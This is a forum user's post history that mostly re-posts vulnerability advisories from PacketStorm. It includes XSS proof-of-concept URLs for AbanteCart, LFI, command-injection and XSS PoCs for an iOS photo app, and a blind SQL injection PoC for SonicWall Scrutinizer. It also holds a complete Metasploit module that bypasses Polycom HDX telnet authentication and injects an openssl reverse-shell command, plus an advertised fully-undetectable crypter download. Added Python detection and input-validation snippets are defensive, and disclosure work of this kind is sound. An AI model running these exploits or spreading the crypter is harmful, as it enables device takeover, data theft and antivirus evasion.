Everything posted by Praetorian503

  1. AbanteCart version 1.1.3 suffers from multiple cross site scripting vulnerabilities.

AbanteCart 1.1.3 (index.php) Multiple Reflected XSS Vulnerabilities

Vendor: Belavier Commerce
Product web page: http://www.abantecart.com
Affected version: 1.1.3

Summary: AbanteCart is a free PHP based eCommerce solution for merchants that provides the ability to create an online business and sell products online quickly and efficiently.

Desc: AbanteCart suffers from multiple reflected cross-site scripting vulnerabilities. The issues are triggered when input passed via several parameters to the 'index.php' script is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5125
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5125.php

08.02.2013

--

Affected parameters: limit, page, rt, sort, currency, product_id, language, s, manufacturer_id, token.

PoC:

http://localhost/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E
http://localhost/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product
http://localhost/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://localhost/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E

Source: PacketStorm
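A log-side detection for the reflected pattern in the advisory above, as an added example that is not part of the post or of the AbanteCart project: it URL-decodes the index.php query string in Apache combined-format access log lines (the log format is an assumption, and the sample lines are constructed) and flags any of the ten parameters the advisory names whose decoded value carries markup.

```python
"""Detect the AbanteCart 1.1.3 reflected-XSS request shape in web server logs."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters named in advisory ZSL-2013-5125 as reflected without sanitisation.
AFFECTED_PARAMS = {"limit", "page", "rt", "sort", "currency", "product_id",
                   "language", "s", "manufacturer_id", "token"}

# Markup fragments that never belong in these parameters' values.
MARKUP = re.compile(r'<[a-z!/]|"\s*>|on\w+\s*=|javascript:', re.I)

# Apache combined log: client, ident, user, [time], "METHOD target proto", status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def decode_value(value, rounds=2):
    """Unquote up to `rounds` times so a double-encoded %2522 quote is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_params(target):
    """Return the sorted affected parameter names whose decoded value contains markup."""
    parts = urlsplit(target)
    if not parts.path.endswith("/index.php"):
        return []
    hits = set()
    # parse_qsl already unquotes once; decode_value handles a second layer.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in AFFECTED_PARAMS and MARKUP.search(decode_value(value)):
            hits.add(name)
    return sorted(hits)


def scan_log(lines):
    """Return (client_ip, flagged_params, target) for every request that matches."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if match is None:
            continue
        flagged = find_xss_params(match.group("target"))
        if flagged:
            findings.append((match.group("ip"), flagged, match.group("target")))
    return findings


# Constructed sample: one benign request, one shaped like the PoC, one double-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Feb/2013:10:01:02 +0000] "GET /abantecart/index.php?rt=product/special&page=1&limit=10 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/Feb/2013:10:01:09 +0000] "GET /abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1&rt=product/special HTTP/1.1" 200 5204',
    '203.0.113.9 - - [08/Feb/2013:10:02:40 +0000] "GET /abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%2522%253E%253Cscript%253E HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for ip, params, target in scan_log(SAMPLE_LOG):
        print(f"{ip} reflected-XSS attempt via {', '.join(params)}: {target}")
```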
  2. Download UFR Crypter re(FUD).rar
NowDownload - Keeping your files safe.
Pass imagen (Hex)

File Info:
File Name: Stub.exe
SHA1: 31142069363d04c7e81e16e268abf548c9506475
MD5: 2909acd1e62ef01f755a87a4d57a0d7f
Date and Time: 13-02-13,11:25:54
Report Generated by LeVeL-23.Biz
File Size: 658433 Bytes
Detection: 0 of 35

File Info:
File Name: result.exe
SHA1: 859f0c90f25c3a1d1134deae88da26c597634604
MD5: c6e00da17d4fdb647a546a247e93d214
Date and Time: 13-02-13,11:33:50
Report Generated by LeVeL-23.Biz
File Size: 683530 Bytes
Detection: 0 of 35
  3. The Polycom HDX is a series of telecommunication and video devices. The telnet component of Polycom HDX video endpoint devices is vulnerable to an authorization bypass when multiple simultaneous connections are repeatedly made to the service, allowing remote network attackers to gain full access to a Polycom command prompt without authentication. Versions prior to 3.0.4 also contain OS command injection in the ping command which can be used to escape the telnet prompt and execute arbitrary commands as root. Full Metasploit module included.

========================================================================
= Polycom HDX Telnet Authorization Bypass
=
= Vendor Website:
= www.polycom.com
=
= Affected Version:
= Polycom HDX devices:
= All releases prior to and including Commercial 3.0.5
=
= Public disclosure on January 18, 2013
=
========================================================================

== Overview ==

The Polycom HDX is a series of telecommunication and video devices. The telnet component of Polycom HDX video endpoint devices is vulnerable to an authorization bypass when multiple simultaneous connections are repeatedly made to the service, allowing remote network attackers to gain full access to a Polycom command prompt without authentication. Versions prior to 3.0.4 also contain OS command injection in the ping command which can be used to escape the telnet prompt and execute arbitrary commands as root.

== Solution ==

Until a software solution is released, Polycom recommends administrators disable telnet on their HDX unit.

== Credit ==

Discovered and advised to Polycom Inc., 2012 by Paul Haas of Security-Assessment.com.

== About Security-Assessment.com ==

Security-Assessment.com is a leading team of Information Security consultants specializing in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognized companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients.

Web: www.security-assessment.com
Email: info@security-assessment.com

== Exploitation ==

The following Metasploit module can be used to reproduce the issue:

cat > psh_auth_bypass.rb <<'EOF'
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Polycom Command Shell Authorization Bypass',
      'Alias'          => 'psh_auth_bypass',
      'Author'         =>
        [
          'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>'
        ],
      'DisclosureDate' => 'Jan 18 2013',
      'Description'    => %q{
        The login component of the Polycom Command Shell on Polycom HDX Video
        End Points running software versions 3.0.5 and earlier is vulnerable
        to an authorization bypass when simultaneous connections are made to
        the service, allowing remote network attackers to gain access to a
        sandboxed telnet prompt without authentication. Versions prior to
        3.0.4 contain OS command injection in the ping command which can be
        used to execute arbitrary commands as root.
      },
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
          [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ]
        ],
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Targets'        =>
        [
          [ "Universal", {} ]
        ],
      'Payload'        =>
        {
          'Space'       => 8000,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
            },
        },
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'cmd/unix/reverse_openssl'
        },
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(23),
        OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
        OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
      ], self.class)

    register_advanced_options(
      [
        OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
        OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
      ], self.class)
  end

  def check
    connect
    sock.put(Rex::Text.rand_text_alpha(rand(5)+1) + "\n")
    ::IO.select(nil, nil, nil, 1)
    res = sock.get
    disconnect

    if !(res and res.length > 0)
      return Exploit::CheckCode::Safe
    end

    if (res =~ /Welcome to ViewStation/)
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    # Keep track of results (successful connections)
    results = []

    # Random string for password
    password = Rex::Text.rand_text_alpha(rand(5)+1)

    # Threaded login checker
    max_threads = datastore['THREADS']
    cur_threads = []

    # Try up to 100 times just to be sure
    queue = [*(1 .. datastore['MAX_CONNECTIONS'])]

    print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")

    while(queue.length > 0)
      while(cur_threads.length < max_threads)

        # We can stop if we get a valid login
        break if results.length > 0

        # keep track of how many attempts we've made
        item = queue.shift

        # We can stop if we reach max tries
        break if not item

        t = Thread.new(item) do |count|
          sock = connect
          sock.put(password + "\n")
          res = sock.get
          while res.length > 0
            break if results.length > 0

            # Post-login Polycom banner means success
            if (res =~ /Polycom/)
              results << sock
              break

            # bind error indicates bypass is working
            elsif (res =~ /bind/)
              sock.put(password + "\n")

            # Login error means we need to disconnect
            elsif (res =~ /failed/)
              break

            # Too many connections means we need to disconnect
            elsif (res =~ /Error/)
              break
            end

            res = sock.get
          end
        end

        cur_threads << t
      end

      # We can stop if we get a valid login
      break if results.length > 0

      # Add to a list of dead threads if we're finished
      cur_threads.each_index do |ti|
        t = cur_threads[ti]
        if not t.alive?
          cur_threads[ti] = nil
        end
      end

      # Remove any dead threads from the set
      cur_threads.delete(nil)

      ::IO.select(nil, nil, nil, 0.25)
    end

    # Clean up any remaining threads
    cur_threads.each {|sock| sock.kill }

    if results.length > 0
      print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
      do_payload(results[0])
    else
      print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
    end
  end

  def do_payload(sock)
    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

    # Start a listener
    start_listener(true)

    # Figure out the port we picked
    cbport = self.service.getsockname[2]

    # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
    cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
    sock.put(cmd)

    # Give time for our command to be queued and executed
    1.upto(5) do
      ::IO.select(nil, nil, nil, 1)
      break if session_created?
    end
  end

  def stage_final_payload(cli)
    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
    cli.put(payload.encoded + "\n")
  end

  def start_listener(ssl = false)
    comm = datastore['ListenerComm']
    if comm == "local"
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    self.service = Rex::Socket::TcpServer.create(
      'LocalPort' => datastore['CBPORT'],
      'SSL'       => ssl,
      'SSLCert'   => datastore['SSLCert'],
      'Comm'      => comm,
      'Context'   =>
        {
          'Msf'        => framework,
          'MsfExploit' => self,
        })

    self.service.on_client_connect_proc = Proc.new { |client|
      stage_final_payload(client)
    }

    # Start the listening service
    self.service.start
  end

  # Shut down any running services
  def cleanup
    super
    if self.service
      print_status("Shutting down payload stager listener...")
      begin
        self.service.deref if self.service.kind_of?(Rex::Service)
        if self.service.kind_of?(Rex::Socket)
          self.service.close
          self.service.stop
        end
        self.service = nil
      rescue ::Exception
      end
    end
  end

  # Accessor for our TCP payload stager
  attr_accessor :service
end
EOF

Source: PacketStorm
  4. Transferable Remote version 1.1 for iPad and iPhone suffers from cross site scripting, remote command injection, and local file inclusion vulnerabilities.

Title:
======
Transferable Remote v1.1 iPad iPhone - Multiple Web Vulnerabilities

Date:
=====
2013-02-09

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=863

VL-ID:
=====
863

Common Vulnerability Scoring System:
====================================
8.5

Introduction:
=============
Transferable is the easiest way to download photos from your iPhone, iPad or iPod Touch to your Mac or PC! Transferable lets you download your photos and albums using just a web browser - no need for iTunes or even plugging your device in! As soon as the app launches it displays a web address; simply type this into a web browser on your PC or Mac and you will be able to browse, download or upload photos and albums!

- Easy to use interface
- Wifi Transfer - iTunes not required
- Download single pictures or whole albums!
- Upload photos from your PC/Mac to your iPhone, iPad or iPod Touch
- Star your favorite photos for download
- No limit on number of photos that can be downloaded
- Works with any web browser - no installation required!
- View Thumbnails and full resolution pictures
- Download photos as a zip

Transferable requires a wifi connection and an iPhone or iPad device with iOS.

(Copy of the Homepage: https://itunes.apple.com/us/app/transferable-pro-wifi-photo/id518154149)

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the mobile Transferable Remote v1.01 app for the Apple iPad & iPhone.

Report-Timeline:
================
2013-02-09: Public Disclosure

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: Transferable Remote 1.01

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
1.1
A local file include web vulnerability via POST request method is detected in the mobile Transferable Remote v1.01 app for the Apple iPad & iPhone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. The vulnerability is located in the downloadPhoto module of the webserver (http://192.168.0.10:80) when processing to load a manipulated `assets-library` url parameter. The execution of the injected path or file request will occur when the attacker is processing to reload the index listing of the affected module. Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction. Successful exploitation of the vulnerability results in unauthorized path or file access via local file or path include attack.

Vulnerable Application(s):
[+] Transferable Remote v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] downloadPhoto

Vulnerable Parameter(s):
[+] assets-library

Affected Module(s):
[+] Index Listing

1.2
A local command injection web vulnerability is detected in the mobile Transferable Remote v1.01 app for the Apple iPad & iPhone. The vulnerability allows injecting local commands via vulnerable system values to compromise the Apple mobile application. The vulnerability is located in the index module when processing to load the iPad or iPhone device name. Local attackers can change the iPad or iPhone device name to system specific commands and file/path requests to provoke the execution when processing to watch the index listing. Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and path requests.

Vulnerable Application(s):
[+] Transferable Remote v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Index

Vulnerable Parameter(s):
[+] device name - iPad or iPhone

Affected Module(s):
[+] Index Listing (Device Name)

1.3
A persistent input validation vulnerability is detected in the mobile Transferable Remote v1.01 app for the Apple iPad & iPhone. The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app web service. The vulnerability is located in the downloadCollection module of the webserver (http://192.168.0.10:80) when processing a POST request with manipulated name, ext and url parameters. The persistent script code will be executed out of the downloadcollection module listing. Exploitation of the vulnerability requires low or medium user interaction and a low or medium privileged application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation.

Vulnerable Application(s):
[+] Transferable Remote v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] downloadCollection

Vulnerable Parameter(s):
[+] url & ext

Affected Module(s):
[+] Index Listing (Device Name)

1.4
A non-persistent cross site scripting vulnerability is detected in the mobile Transferable Remote v1.01 app for the Apple iPad & iPhone. The vulnerability allows remote attackers to form manipulated requests to hijack employee, moderator or admin sessions via client side browser attack. The vulnerability is located in the appliance's invalid Exception Handling module and the insecurely parsed path & id variables. Successful exploitation of the vulnerability results in account steal via client side session hijacking, client side phishing, or client-side content request manipulation.

Vulnerable Application(s):
[+] Transferable Remote v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Index

Vulnerable Parameter(s):
[+] page and bound id

Affected Module(s):
[+] Exception Handling (Error) Listing

Proof of Concept:
=================
1.1
The local File Include web vulnerability can be exploited by a remote attacker without a required application user account (no password: standard) and also without user interaction. For demonstration or to reproduce ...

Local Path Include Vulnerability PoC:
http://192.168.0.10/downloadPhoto/assets-library://[INCLUDE FILE, PATH OR URL]<(POST)

Reference(s):
http://192.168.0.10/downloadPhoto/

1.2
The command injection web vulnerability can be exploited by a local attacker with a required device application user account and with low user interaction. For demonstration or to reproduce ...

Command Injection via Devicename PoC:
{"devcname":"IPad360 ¥337","devctype":"ipad","pro":"false"}
...
{"devcname":"[COMMAND INJECTION VIA DEVICENAME]","devctype":"ipad","pro":"false"<OR true;)}

Reference(s):
http://192.168.0.10/getSettings
http://192.168.0.10/

1.3
The persistent validation web vulnerability can be exploited by remote attackers with a required application user account and with low or medium user interaction. For demonstration or to reproduce ...

POST Inject via Download marked (star) files PoC:

Reference(s):
http://192.168.0.10/downloadCollection

1.4
The client side cross site scripting web vulnerability can be exploited by a remote attacker without a privileged application user account and with medium or high required user interaction. For demonstration or to reproduce ...

Client Side Cross Site Scripting - Exception Handling PoC:
http://137.168.0.10:15555/0/-x[CLIENT SIDE INJECTED SCRIPT CODE! XSS]

Manual steps to reproduce ...
1. Install the service application on your mobile iPad or iPhone device
2. Start the software and open http://192.168.0.10:15555/
3. Include the following path `0/-1` to provoke an invalid application error (Example: http://137.168.0.10:15555/0/-1)
4. The -1 will be displayed with the path in a script bound to the invalid value exception
5. Now, the attacker can include his script code and request the same script via GET again
6. The script will be executed on client side in the browser when processing to load the manipulated link
7. Successful reproduce ... done!

Reference(s):
http://137.168.0.10:15555/0/
http://137.168.0.10:15555/1/
http://137.168.0.10:15555/2
http://137.168.0.10:15555/3/

Risk:
=====
1.1
The security risk of the file include web vulnerability is estimated as critical.

1.2
The security risk of the local command inject vulnerability via devicename is estimated as high(-).

1.3
The security risk of the persistent input validation web vulnerability is estimated as medium(+).

1.4
The security risk of the client side cross site scripting web vulnerability is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meister@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: PacketStorm
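Server-side handling that would close findings 1.1 and 1.3 of the advisory above, as an added example rather than code from the Transferable app: the `assets-library` URL is parsed against a strict grammar and the listing escapes every user-supplied value at output. The URL shape `assets-library://asset/asset.<EXT>?id=<UUID>&ext=<EXT>`, the JSON field names `url`/`name`, and JPG/PNG as the only served extensions are assumptions.

```python
"""Strict asset-URL parsing and output escaping for a photo-listing web service."""
import html
import json
import re
from urllib.parse import urlsplit, parse_qs

ALLOWED_EXT = {"JPG", "PNG"}  # assumed: the only extensions the app serves
UUID_RE = re.compile(r"^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$")
# Display names: letters, digits, underscore, space, dash, then one dot and the extension.
NAME_RE = re.compile(r"^[A-Za-z0-9_ -]{1,64}\.(JPG|PNG)$")


class InvalidInput(ValueError):
    """Anything outside the expected grammar is rejected, never repaired."""


def parse_asset_url(url):
    """Return (uuid, ext) for a well-formed asset URL; refuse any other scheme, host or path.

    The server later resolves the asset from the id alone, so a client can no
    longer point the downloadPhoto module at an arbitrary local path (1.1).
    """
    parts = urlsplit(url)
    if parts.scheme != "assets-library" or parts.netloc != "asset":
        raise InvalidInput("URL must start with assets-library://asset/")
    path_match = re.fullmatch(r"/asset\.([A-Z]{3,4})", parts.path)
    if path_match is None:
        raise InvalidInput("path must be /asset.<EXT>")
    try:
        query = parse_qs(parts.query, keep_blank_values=True, strict_parsing=True)
    except ValueError:
        raise InvalidInput("malformed query string") from None
    if set(query) != {"id", "ext"} or len(query["id"]) != 1 or len(query["ext"]) != 1:
        raise InvalidInput("query must carry exactly one id and one ext")
    asset_id, ext = query["id"][0].upper(), query["ext"][0].upper()
    if UUID_RE.match(asset_id) is None:
        raise InvalidInput("id is not a UUID")
    if ext not in ALLOWED_EXT or ext != path_match.group(1):
        raise InvalidInput("ext not allowed or inconsistent with the path")
    return asset_id, ext


def validate_collection(raw_json):
    """Validate a downloadCollection POST body (assumed JSON array of url/name objects)."""
    try:
        items = json.loads(raw_json)
    except json.JSONDecodeError as exc:
        raise InvalidInput(f"bad JSON: {exc.msg}") from None
    if not isinstance(items, list) or not items:
        raise InvalidInput("input must be a non-empty array")
    cleaned = []
    for item in items:
        if not isinstance(item, dict):
            raise InvalidInput("each entry must be an object")
        asset_id, ext = parse_asset_url(str(item.get("url", "")))
        name = str(item.get("name", ""))
        if NAME_RE.match(name) is None or not name.endswith("." + ext):
            raise InvalidInput("name must be a plain filename matching the asset's extension")
        cleaned.append({"id": asset_id, "ext": ext, "name": name})
    return cleaned


def render_listing(entries):
    """Build the index listing; every user-influenced value is escaped at output (1.3).

    The link carries only the validated id and extension, never the client's URL.
    """
    rows = []
    for entry in entries:
        href = f"/downloadPhoto/{entry['id']}.{entry['ext']}"
        rows.append(f'<li><a href="{html.escape(href, quote=True)}">'
                    f'{html.escape(entry["name"])}</a></li>')
    return "<ul>" + "".join(rows) + "</ul>"
```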
  5. Sonicwall Scrutinizer version 9.5.2 suffers from a remote blind SQL injection vulnerability.

Title:
======
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability

Date:
=====
2013-02-13

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL injection
#10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped

VL-ID:
=====
789

Common Vulnerability Scoring System:
====================================
7.3

Introduction:
=============
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a SQL Injection vulnerability in the Dell's Sonicwall OEM Scrutinizer v9.5.2 appliance application.

Report-Timeline:
================
2012-12-05: Researcher Notification & Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public Disclosure

Status:
========
Published

Affected Products:
==================
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bug allows remote attackers to execute/inject their own sql statements/commands to manipulate the affected vulnerable application dbms. The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or gadget parameters. Exploitation requires no user interaction & no privileged application user account. Successful exploitation of the remote sql vulnerability results in dbms & application compromise.

Vulnerable File(s):
[+] fa_web.cgi

Vulnerable Module(s):
[+] gadget listing

Vulnerable Parameter(s):
[+] orderby
[+] gadget

Proof of Concept:
=================
The remote sql injection vulnerability can be exploited by remote attackers without a privileged application user account and also without user interaction. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27

Solution:
=========
1) Scrutinizer team created its own DB layer that will die if a semicolon is found within a SQL query
2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection

Risk:
=====
The security risk of the remote sql injection vulnerability is estimated as high(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: PacketStorm
  6. This advisory documents the 17th PayPal bug bounty Vulnerability Labs received for a cross site scripting vulnerability.

Title:
======
Paypal Bug Bounty #17 - Persistent Web Vulnerability

Date:
=====
2013-01-28

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=671

PayPal UID: tlm30fdsh

VL-ID:
=====
671

Common Vulnerability Scoring System:
====================================
3

Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account.

